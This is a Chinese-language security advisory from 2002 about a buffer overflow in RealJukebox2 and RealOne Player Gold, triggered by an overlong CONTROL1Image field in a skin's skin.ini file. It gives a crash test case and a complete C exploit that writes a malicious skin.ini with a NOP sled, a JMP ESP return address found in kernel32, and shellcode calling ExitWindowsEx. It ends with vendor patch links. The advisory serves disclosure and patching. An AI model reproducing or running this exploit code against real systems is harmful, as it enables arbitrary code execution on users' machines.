Real Networks RealJukebox/RealOne Player Gold Skinfile缓冲溢出漏洞发布时间:2002-07-15 更新时间:2002-07-15 严重程度:高 威胁程度:普通用户访问权限 错误类型:边界检查错误 利用方式:服务器模式 BUGTRAQ ID:5217 受影响系统 Real Networks RealJukebox 2 for Windows 1.0.2 .379详细描述 RealJukebox2和Real Player Gold存在漏洞,由于对SKIIN文件中的字段缺少正确的检查,当攻击者在"skin.ini"文件中提交包含超长的"CONTROLnImage"文件名,当RealJukebox2和Real Player Gold处理时就可以造成缓冲溢出,精心构造数据可导致任意代码执行。 测试代码 如skin.ini中包含如下字段: [MAIN] Application=RealJukebox Version=2 SkinFamilyCount=5 CONTROL1Image=aaaaaaaaaa... long'a' 保存为zip文件并改名为'.rjs',当IE浏览的时候,可导致应用程序崩溃。 /*=========================================================== RealJukebox2 1.0.2.379 Exploit for Windows Windows2000 Professional (Service Pack 2) The Shadow Penguin Security (http://www.shadowpenguin.org) Written by UNYUN (unyun@shadowpenguin.org) ============================================================ */ #include <stdio.h> #include <windows.h> #define MAXBUF 4096 #define KERNEL_NAME "kernel32.dll" #define SKIN_INI "skin.ini" #define INI_FILE \ "[MAIN]\n"\ "Application=RealJukebox\n"\ "Version=2\n"\ "SkinFamilyCount=5\n"\ "\n"\ "CONTROL1Image=%s\n" #define NOP 0x90 #define FAKE_OFS1 36 #define FAKE_VAL1 0x7FFDF0F0 #define RETADR_OFS 28 #define CODE_OFS 60 #define RETADR_2000pro 0x77e0af64 static unsigned char egg_2000pro[512]={ 0xB8,0xA5,0xFA,0xE1,0x77,0x33,0xDB,0xB3, 0x04,0x53,0x53,0xFF,0xD0,0x90,0xEB,0xFD, 0x00 }; unsigned int search_mem(unsigned char *st,unsigned char *ed, unsigned char c1,unsigned char c2) { unsigned char *p; unsigned int adr; for (p=st;p<ed;p++) if (*p==c1 && *(p+1)==c2){ adr=(unsigned int)p; if ((adr&0xff)==0) continue; if (((adr>>8)&0xff)==0) continue; if (((adr>>16)&0xff)==0) continue; if (((adr>>24)&0xff)==0) continue; return(adr); } return(0); } void valset(char *buf,unsigned int val) { buf[0]=val&0xff; buf[1]=(val>>8)&0xff; buf[2]=(val>>16)&0xff; buf[3]=(val>>24)&0xff; } int main(int argc,char *argv[]) { FILE *fp; char buf[MAXBUF]; unsigned int tgt,exw; unsigned char *kp; if ((fp=fopen(SKIN_INI,"wb"))==NULL){ printf("Can not write file.\n"); exit(1); } memset(buf,NOP,sizeof(buf)); buf[sizeof(buf)-1]='\0'; if ((kp=(unsigned char *)LoadLibrary(KERNEL_NAME))==NULL){ printf("Can not find %s\n",KERNEL_NAME); exit(1); } tgt=search_mem(kp,kp+0x100000,0xff,0xe4); if (tgt==0) tgt=RETADR_2000pro; printf("kp = 0x%x\n",kp); printf("JMP ESP addr = 0x%x\n",tgt); exw=(unsigned int)ExitWindowsEx; printf("ExitWindowsEx = 0x%x\n",exw); valset(buf+FAKE_OFS1,FAKE_VAL1); valset(buf+RETADR_OFS,tgt); valset(egg_2000pro+1,exw); strncpy(buf+CODE_OFS,egg_2000pro,strlen(egg_2000pro)); fprintf(fp,INI_FILE,buf); fclose(fp); printf("Created '%s'.\n",SKIN_INI); return(0); } 解决方案 补丁下载: Real Networks RealJukebox 2 for Windows 1.0.2 .379: Real Networks Patch skinpfree2.rmp http://www.service.real.com/help/faq/security/07092002/skinpfree2.rmp Real Networks RealJukebox 2 Plus for Windows 1.0.2 .379: Real Networks Patch skinpplus2.rmp http://www.service.real.com/help/faq/security/07092002/skinpplus2.rmp Real Networks RealJukebox 2 Plus for Windows 1.0.2 .340: Real Networks Patch skinpplus1.rmp http://www.service.real.com/help/faq/security/07092002/skinpplus1.rmp Real Networks RealJukebox 2 for Windows 1.0.2 .340: Real Networks Patch skinpfree1.rmp http://www.service.real.com/help/faq/security/07092002/skinpfree1.rmp Real Networks RealOne Player Gold for Windows 6.0.10 .505: Real Networks Patch skinpatchr11s.rmp http://www.service.real.com/help/faq/security/07092002/skinpatchr11s.rmp 相关信息 UNYUN <unyun@shadowpenguin.org>. 参考:http://online.securityfocus.com/archive/1/281878 相关主页:http://www.service.real.com/help/faq/security/bufferoverrun07092002.html |
